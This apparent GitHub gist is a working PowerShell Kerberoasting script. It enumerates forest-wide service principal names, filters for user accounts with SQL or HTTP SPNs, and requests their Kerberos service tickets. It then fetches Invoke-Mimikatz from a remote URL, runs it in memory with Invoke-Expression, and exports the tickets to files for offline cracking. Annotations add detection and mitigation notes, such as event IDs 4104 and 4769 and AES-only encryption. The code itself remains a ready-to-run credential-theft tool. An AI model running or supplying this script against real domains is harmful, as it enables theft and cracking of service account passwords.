@FrankSpierings
Created January 14, 2016 19:30
function parse {
    <#
    .SYNOPSIS
    Groups lines of setspn query output into one record per account.

    .DESCRIPTION
    Walks the input line by line. A line matching "CN=" (case-insensitive)
    closes the record being built and starts a new one, with that line stored
    unchanged as Name. A line containing a tab character is trimmed and
    appended to the current record's SPN list. A line matching both patterns
    is handled by both branches.
    Presumably this mirrors setspn -Q output, where each account's
    distinguished name is followed by tab-indented SPNs - confirm against the
    output of the setspn version in use.

    .PARAMETER SetSPNOutput
    The output lines to group.

    .OUTPUTS
    PSObject records with the properties Name (the header line) and SPN (array
    of trimmed strings). At least one record is always emitted; when the input
    contains no "CN=" line that record has an empty Name.
    #>
    param(
        [Object[]]$SetSPNOutput
    )

    $records = @()
    # Start with an empty record so SPN lines seen before any header still
    # have somewhere to go.
    $current = New-Object PSObject -Property @{
        Name = ''
        SPN  = @()
    }
    $sawHeader = $false

    foreach ($line in $SetSPNOutput) {
        if ($line -imatch "CN=") {
            # The first header reuses the initial record; every later header
            # flushes the finished record and opens a fresh one.
            if ($sawHeader) {
                $records += $current
                $current = New-Object PSObject -Property @{
                    Name = ''
                    SPN  = @()
                }
            }
            $sawHeader = $true
            $current.Name = $line
        }
        if ($line -imatch "\t") {
            $current.SPN += [String]$line.trim()
        }
    }

    # Flush the record that was still open when the input ended.
    $records += $current
    $records
}
# Load System.IdentityModel, which provides the
# KerberosRequestorSecurityToken class instantiated in the loop below.
Add-Type -AssemblyName System.IdentityModel
# Output directory: "out" under the user's temp directory. mkdir errors
# (for example when the directory already exists) are suppressed, and the
# working directory is switched to it - presumably so the export step at the
# end writes its files there.
$outpath = (Join-Path $env:temp "out")
mkdir $outpath -ErrorAction SilentlyContinue | Out-Null
Set-Location $outpath
# Download Invoke-Mimikatz.ps1 as a string and run it with Invoke-Expression,
# so the script is never written to disk.
# NOTE(review): the URL tracks the master branch of a third-party repository
# and the text is executed with no version pin or integrity check, so whatever
# that URL serves at run time is what runs.
# Detection: PowerShell script block logging (event ID 4104) and AMSI still see
# the downloaded script content even though no file is created; the outbound
# request to raw.githubusercontent.com is visible in proxy/DNS logs.
Invoke-Expression (New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1')
# Query for every registered SPN (-Q */*) across the forest (-F).
$spns = (setspn -F -Q */*)
# Purge the cached Kerberos tickets of the current logon session - presumably so
# that only the tickets requested below are in the cache when it is exported.
klist purge
# Keep the parsed entries that have at least one SPN matching SQL or HTTP and
# whose Name line matches 'User', then request a service ticket for each.
parse $spns |? {$_.SPN |? {$_ -imatch 'SQL|HTTP'}} |? {$_.Name -imatch 'User'} |% {
# Emit the entry's name, then try its SPNs in order and stop at the first
# request that succeeds (one ticket per entry).
$_.Name
foreach ($spn in $_.SPN) {
try {
# Constructing the token requests a Kerberos service ticket for $spn; the
# token object itself is emitted to the output.
# Detection: each request is recorded on the domain controller as event ID
# 4769. One account requesting tickets for many different services in a short
# window, particularly with RC4 (ticket encryption type 0x17), is the usual
# indicator. Mitigation: long random passwords or group managed service
# accounts for SPN-bearing accounts, and AES-only encryption types.
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $spn
break
}
catch {
# Failures are swallowed silently; the loop moves on to the next SPN.
}
}
}
# Run mimikatz's "kerberos::list /export" to list the cached tickets and
# export them to files, then list the contents of the output directory.
Invoke-Mimikatz -Command "`"kerberos::list /export`""
gci $outpath